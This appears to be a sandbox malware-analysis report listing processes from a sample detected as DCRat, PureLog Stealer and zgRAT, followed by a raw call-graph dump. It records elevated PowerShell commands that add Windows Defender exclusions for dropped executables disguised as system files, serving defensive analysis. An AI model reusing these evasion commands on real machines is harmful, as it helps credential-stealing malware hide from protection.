                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1771990456.00000000133B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.1686628391.0000000000F32000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\mshypercomponentSavesdll\agentFont.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\mshypercomponentSavesdll\agentFont.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:24
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe'
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:25
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:26
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:27
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ApplicationFrameHost.exe'
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:28
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:29
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe'
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:30
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:false

                                                                                  Target ID:31
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:32
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\agentFont.exe'
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:33
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:false

                                                                                  Target ID:34
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:false

                                                                                  Target ID:35
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:36
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\z0MvDYgz73.bat"
                                                                                  Imagebase:0x7ff6fa930000
                                                                                  File size:289'792 bytes
                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:37
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:38
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Imagebase:0x620000
                                                                                  File size:3'284'992 bytes
                                                                                  MD5 hash:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:39
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Imagebase:0x20000
                                                                                  File size:3'284'992 bytes
                                                                                  MD5 hash:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:42
                                                                                  Start time:05:27:04
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:chcp 65001
                                                                                  Imagebase:0x7ff7a8480000
                                                                                  File size:14'848 bytes
                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:43
                                                                                  Start time:05:27:04
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                                                                  Imagebase:0xcb0000
                                                                                  File size:3'284'992 bytes
                                                                                  MD5 hash:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Has exited:true

                                                                                  Target ID:44
                                                                                  Start time:05:27:04
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                                                                  Imagebase:0x600000
                                                                                  File size:3'284'992 bytes
                                                                                  MD5 hash:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:47
                                                                                  Start time:05:27:05
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:ping -n 10 localhost
                                                                                  Imagebase:0x7ff641c70000
                                                                                  File size:22'528 bytes
                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:48
                                                                                  Start time:05:27:08
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff693ab0000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:50
                                                                                  Start time:05:27:14
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\mshypercomponentSavesdll\agentFont.exe"
                                                                                  Imagebase:0xfa0000
                                                                                  File size:3'284'992 bytes
                                                                                  MD5 hash:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:false

                                                                                    Execution Graph

                                                                                    Execution Coverage:12.9%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:31.9%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:32
25931->25963 25932->25908 25934 7ff7b8f294ba 25933->25934 25935 7ff7b8f294d2 25933->25935 25964 7ff7b8f2c5bc 15 API calls memcpy_s 25934->25964 25935->25934 25937 7ff7b8f294dc 25935->25937 25966 7ff7b8f27474 35 API calls 2 library calls 25937->25966 25938 7ff7b8f294bf 25965 7ff7b8f26814 31 API calls _invalid_parameter_noinfo_noreturn 25938->25965 25941 7ff7b8f21d70 _handle_error 8 API calls 25943 7ff7b8f2968f 25941->25943 25942 7ff7b8f294ed memcpy_s 25967 7ff7b8f273f4 15 API calls memcpy_s 25942->25967 25943->25908 25945 7ff7b8f29558 25968 7ff7b8f2787c 46 API calls 3 library calls 25945->25968 25947 7ff7b8f29561 25948 7ff7b8f29569 25947->25948 25949 7ff7b8f29598 25947->25949 25969 7ff7b8f2c7b8 25948->25969 25951 7ff7b8f295f0 25949->25951 25952 7ff7b8f295a7 25949->25952 25953 7ff7b8f29616 25949->25953 25954 7ff7b8f2959e 25949->25954 25955 7ff7b8f2c7b8 __free_lconv_num 15 API calls 25951->25955 25957 7ff7b8f2c7b8 __free_lconv_num 15 API calls 25952->25957 25953->25951 25956 7ff7b8f29620 25953->25956 25954->25951 25954->25952 25959 7ff7b8f294ca 25955->25959 25958 7ff7b8f2c7b8 __free_lconv_num 15 API calls 25956->25958 25957->25959 25958->25959 25959->25941 25960->25908 25961->25909 25964->25938 25965->25959 25966->25942 25967->25945 25968->25947 25970 7ff7b8f2c7bd RtlFreeHeap 25969->25970 25974 7ff7b8f2c7ed __free_lconv_num 25969->25974 25971 7ff7b8f2c7d8 25970->25971 25970->25974 25975 7ff7b8f2c5bc 15 API calls memcpy_s 25971->25975 25973 7ff7b8f2c7dd GetLastError 25973->25974 25974->25959 25975->25973 25977 7ff7b8ef20e2 25976->25977 25978 7ff7b8ef20e8 BuildCatchObjectHelperInternal 25977->25978 25980 7ff7b8ef1490 33 API calls 3 library calls 25977->25980 25978->25501 25980->25978 25983->25545 25984->25535 25985->25543 25986->25548 25988 7ff7b8ef2191 25987->25988 25989 7ff7b8ef218b memcpy_s 25987->25989 25988->25989 25991 7ff7b8ef21d8 33 API calls 4 library calls 25988->25991 25989->25564 25991->25989 25993 7ff7b8f17ed3 SizeofResource 25992->25993 25994 7ff7b8f1801f 
25992->25994 25993->25994 25995 7ff7b8f17eed LoadResource 25993->25995 25994->25588 25995->25994 25996 7ff7b8f17f06 LockResource 25995->25996 25996->25994 25997 7ff7b8f17f1b GlobalAlloc 25996->25997 25997->25994 25998 7ff7b8f17f3c GlobalLock 25997->25998 25999 7ff7b8f17f4e BuildCatchObjectHelperInternal 25998->25999 26000 7ff7b8f18016 GlobalFree 25998->26000 26001 7ff7b8f17f5c CreateStreamOnHGlobal 25999->26001 26000->25994 26002 7ff7b8f17f7a GdipAlloc 26001->26002 26003 7ff7b8f1800d GlobalUnlock 26001->26003 26004 7ff7b8f17f8f 26002->26004 26003->26000 26004->26003 26005 7ff7b8f17ff6 26004->26005 26006 7ff7b8f17fde GdipCreateHBITMAPFromBitmap 26004->26006 26005->26003 26006->26005 26008 7ff7b8f17d50 4 API calls 26007->26008 26009 7ff7b8f17d2e 26008->26009 26010 7ff7b8f17d3d 26009->26010 26018 7ff7b8f17d88 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26009->26018 26010->25592 26010->25593 26010->25595 26012->25596 26014 7ff7b8f17d67 26013->26014 26015 7ff7b8f17d62 26013->26015 26017 7ff7b8f18690 16 API calls _handle_error 26014->26017 26019 7ff7b8f17e14 GetDC 26015->26019 26017->25602 26018->26010 26020 7ff7b8f17e2a GetDeviceCaps GetDeviceCaps ReleaseDC 26019->26020 26021 7ff7b8f17e5d 26019->26021 26020->26021 26021->26014 26023 7ff7b8f08b32 _snwprintf 26022->26023 26024 7ff7b8f08bb7 26023->26024 26025 7ff7b8f08c53 26023->26025 26140 7ff7b8f05bbc 48 API calls 26024->26140 26141 7ff7b8ef3cac 26025->26141 26028 7ff7b8f08c3d 26091 7ff7b8f01890 26028->26091 26029 7ff7b8ef1fa8 31 API calls 26029->26028 26030 7ff7b8f08bc1 BuildCatchObjectHelperInternal 26030->26029 26032 7ff7b8f09635 26030->26032 26035 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26032->26035 26034 7ff7b8f08c7d 26036 7ff7b8f01444 97 API calls 26034->26036 26038 7ff7b8f0963b 26035->26038 26039 7ff7b8f08c86 26036->26039 26037 7ff7b8f08d34 26109 7ff7b8f26d20 26037->26109 26044 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26038->26044 26039->26038 26041 7ff7b8f08cc1 
26039->26041 26047 7ff7b8f21d70 _handle_error 8 API calls 26041->26047 26043 7ff7b8f08ccb 26043->26037 26048 7ff7b8f0809c 33 API calls 26043->26048 26045 7ff7b8f09641 26044->26045 26046 7ff7b8f26d20 31 API calls 26060 7ff7b8f08d6f __vcrt_FlsAlloc 26046->26060 26049 7ff7b8f09615 26047->26049 26048->26043 26049->25605 26050 7ff7b8f08ea3 26051 7ff7b8f01e50 98 API calls 26050->26051 26063 7ff7b8f08f76 26050->26063 26054 7ff7b8f08ebb 26051->26054 26057 7ff7b8f01c80 101 API calls 26054->26057 26054->26063 26061 7ff7b8f08ee3 26057->26061 26060->26050 26060->26063 26117 7ff7b8f01f60 26060->26117 26126 7ff7b8f01c80 26060->26126 26131 7ff7b8f01e50 26060->26131 26061->26063 26083 7ff7b8f08ef1 __vcrt_FlsAlloc 26061->26083 26145 7ff7b8f101a8 MultiByteToWideChar 26061->26145 26136 7ff7b8f01444 26063->26136 26064 7ff7b8f09401 26078 7ff7b8f094d6 26064->26078 26151 7ff7b8f2beb0 31 API calls 2 library calls 26064->26151 26066 7ff7b8f0936d 26066->26064 26148 7ff7b8f2beb0 31 API calls 2 library calls 26066->26148 26067 7ff7b8f09361 26067->25605 26070 7ff7b8f095aa 26073 7ff7b8f26d20 31 API calls 26070->26073 26071 7ff7b8f0945e 26152 7ff7b8f2a6dc 31 API calls _invalid_parameter_noinfo_noreturn 26071->26152 26072 7ff7b8f094c3 26072->26078 26153 7ff7b8f07f20 33 API calls 2 library calls 26072->26153 26076 7ff7b8f095d4 26073->26076 26074 7ff7b8f0809c 33 API calls 26074->26078 26080 7ff7b8f26d20 31 API calls 26076->26080 26078->26070 26078->26074 26079 7ff7b8f09383 26149 7ff7b8f2a6dc 31 API calls _invalid_parameter_noinfo_noreturn 26079->26149 26080->26063 26081 7ff7b8f093ee 26081->26064 26150 7ff7b8f07f20 33 API calls 2 library calls 26081->26150 26083->26063 26083->26064 26083->26066 26083->26067 26084 7ff7b8f09630 26083->26084 26086 7ff7b8f1055c WideCharToMultiByte 26083->26086 26146 7ff7b8f09d14 45 API calls 2 library calls 26083->26146 26147 7ff7b8f26b48 31 API calls 2 library calls 26083->26147 26154 7ff7b8f22074 8 API calls 26084->26154 26086->26083 26090 7ff7b8f09670 26089->26090 
26090->25607 26092 7ff7b8f018cd CreateFileW 26091->26092 26094 7ff7b8f01981 GetLastError 26092->26094 26097 7ff7b8f01a43 26092->26097 26095 7ff7b8f05d18 49 API calls 26094->26095 26096 7ff7b8f019b1 26095->26096 26099 7ff7b8f019b5 CreateFileW GetLastError 26096->26099 26100 7ff7b8f01a01 26096->26100 26098 7ff7b8f01aa3 26097->26098 26101 7ff7b8f01a85 SetFileTime 26097->26101 26102 7ff7b8f01ac9 26098->26102 26103 7ff7b8ef3cac 33 API calls 26098->26103 26099->26100 26100->26097 26106 7ff7b8f01af7 26100->26106 26101->26098 26104 7ff7b8f21d70 _handle_error 8 API calls 26102->26104 26103->26102 26105 7ff7b8f01adc 26104->26105 26105->26034 26105->26043 26107 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26106->26107 26108 7ff7b8f01afc 26107->26108 26110 7ff7b8f26d4d 26109->26110 26116 7ff7b8f26d62 26110->26116 26155 7ff7b8f2c5bc 15 API calls memcpy_s 26110->26155 26112 7ff7b8f26d57 26156 7ff7b8f26814 31 API calls _invalid_parameter_noinfo_noreturn 26112->26156 26113 7ff7b8f21d70 _handle_error 8 API calls 26115 7ff7b8f08d51 26113->26115 26115->26046 26116->26113 26118 7ff7b8f01f7d 26117->26118 26123 7ff7b8f01f99 26117->26123 26119 7ff7b8f01fab 26118->26119 26157 7ff7b8efb118 96 API calls Concurrency::cancel_current_task 26118->26157 26119->26060 26121 7ff7b8f01fb1 SetFilePointer 26121->26119 26122 7ff7b8f01fce GetLastError 26121->26122 26122->26119 26124 7ff7b8f01fd8 26122->26124 26123->26119 26123->26121 26124->26119 26158 7ff7b8efb118 96 API calls Concurrency::cancel_current_task 26124->26158 26127 7ff7b8f01ca6 26126->26127 26128 7ff7b8f01cad 26126->26128 26127->26060 26128->26127 26130 7ff7b8f01710 GetStdHandle ReadFile GetLastError GetLastError GetFileType 26128->26130 26159 7ff7b8efaff4 96 API calls Concurrency::cancel_current_task 26128->26159 26130->26128 26160 7ff7b8f01b3c 26131->26160 26133 7ff7b8f01e77 26133->26060 26137 7ff7b8f0145e 26136->26137 26138 7ff7b8f0146a 26136->26138 26137->26138 26168 7ff7b8f014d0 26137->26168 26140->26030 26142 
7ff7b8ef3cc3 26141->26142 26143 7ff7b8ef3cda BuildCatchObjectHelperInternal 26141->26143 26142->26143 26175 7ff7b8ef1490 33 API calls 3 library calls 26142->26175 26143->26028 26145->26083 26146->26083 26147->26083 26148->26079 26149->26081 26150->26064 26151->26071 26152->26072 26153->26078 26154->26032 26155->26112 26156->26116 26166 7ff7b8f01b4a _snwprintf 26160->26166 26161 7ff7b8f01b76 26163 7ff7b8f21d70 _handle_error 8 API calls 26161->26163 26162 7ff7b8f01c45 SetFilePointer 26162->26161 26164 7ff7b8f01c6d GetLastError 26162->26164 26165 7ff7b8f01bd9 26163->26165 26164->26161 26165->26133 26167 7ff7b8efb118 96 API calls Concurrency::cancel_current_task 26165->26167 26166->26161 26166->26162 26169 7ff7b8f014ea 26168->26169 26170 7ff7b8f01502 26168->26170 26169->26170 26172 7ff7b8f014f6 CloseHandle 26169->26172 26171 7ff7b8f01526 26170->26171 26174 7ff7b8efaca4 96 API calls 26170->26174 26171->26138 26172->26170 26174->26171 26175->26143 26177 7ff7b8f07276 SetCurrentDirectoryW 26176->26177 26178 7ff7b8f07273 26176->26178 26177->25620 26178->26177 26182 7ff7b8ef8ac4 26179->26182 26186 7ff7b8ef8b6f 26179->26186 26184 7ff7b8ef8aca 26182->26184 26185 7ff7b8f21c20 4 API calls 26182->26185 26188 7ff7b8ef1f88 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 26184->26188 26185->26184 26189 7ff7b8ef200c 33 API calls std::_Xinvalid_argument 26186->26189 26187->25628 26190->25643 26192 7ff7b8f2ae4c 26199 7ff7b8f2ab54 26192->26199 26204 7ff7b8f2c360 35 API calls 3 library calls 26199->26204 26203 7ff7b8f2ab5f 26205 7ff7b8f2bf88 35 API calls abort 26203->26205 26204->26203 26206 7ff7b8f21830 26207 7ff7b8f217b7 26206->26207 26207->26206 26208 7ff7b8f21330 _com_raise_error 14 API calls 26207->26208 26208->26207 26209 7ff7b8f1a9a0 26568 7ff7b8ef26c8 26209->26568 26211 7ff7b8f1a9fd 26212 7ff7b8f1aa17 26211->26212 26213 7ff7b8f1b8dd 26211->26213 26262 7ff7b8f1aa01 26211->26262 26216 7ff7b8f1aa27 26212->26216 26217 7ff7b8f1ab1c 
26212->26217 26212->26262 26772 7ff7b8f1ebd8 26213->26772 26215 7ff7b8f21d70 _handle_error 8 API calls 26219 7ff7b8f1bdc7 26215->26219 26220 7ff7b8f1aaea 26216->26220 26221 7ff7b8f1aa2f 26216->26221 26224 7ff7b8f1abd3 26217->26224 26229 7ff7b8f1ab36 26217->26229 26226 7ff7b8f1ab0c EndDialog 26220->26226 26220->26262 26231 7ff7b8f0a008 58 API calls 26221->26231 26221->26262 26222 7ff7b8f1b904 SendMessageW 26223 7ff7b8f1b913 26222->26223 26227 7ff7b8f1b93a GetDlgItem SendMessageW 26223->26227 26228 7ff7b8f1b91f SendDlgItemMessageW 26223->26228 26576 7ff7b8ef241c GetDlgItem 26224->26576 26226->26262 26232 7ff7b8f055f8 35 API calls 26227->26232 26228->26227 26233 7ff7b8f0a008 58 API calls 26229->26233 26235 7ff7b8f1aa6a 26231->26235 26236 7ff7b8f1b994 GetDlgItem 26232->26236 26237 7ff7b8f1ab54 SetDlgItemTextW 26233->26237 26234 7ff7b8f1abf3 26244 7ff7b8f1ac0b EndDialog 26234->26244 26795 7ff7b8ef1ecc 34 API calls _handle_error 26235->26795 26791 7ff7b8ef268c 26236->26791 26240 7ff7b8f1ab69 26237->26240 26252 7ff7b8f1ab76 GetMessageW 26240->26252 26240->26262 26241 7ff7b8f1ac49 GetDlgItem 26242 7ff7b8f1ac90 SetFocus 26241->26242 26243 7ff7b8f1ac63 SendMessageW SendMessageW 26241->26243 26248 7ff7b8f1ad49 26242->26248 26249 7ff7b8f1aca6 26242->26249 26243->26242 26379 7ff7b8f1ac15 26244->26379 26245 7ff7b8f1aa7d 26251 7ff7b8f1aa96 26245->26251 26796 7ff7b8ef2678 26245->26796 26255 7ff7b8ef8a94 33 API calls 26248->26255 26256 7ff7b8f0a008 58 API calls 26249->26256 26250 7ff7b8f1b55c 26250->26234 26257 7ff7b8f1b564 26250->26257 26251->26262 26267 7ff7b8f1bdda 26251->26267 26253 7ff7b8f1ab94 IsDialogMessageW 26252->26253 26252->26262 26253->26240 26260 7ff7b8f1aba9 TranslateMessage DispatchMessageW 26253->26260 26263 7ff7b8f1ad8f 26255->26263 26264 7ff7b8f1acb0 26256->26264 26265 7ff7b8f0a008 58 API calls 26257->26265 26258 7ff7b8ef1fa8 31 API calls 26258->26262 26260->26240 26262->26215 26799 7ff7b8f1e7b8 33 API calls 2 library calls 26263->26799 26278 7ff7b8ef12c0 33 API 
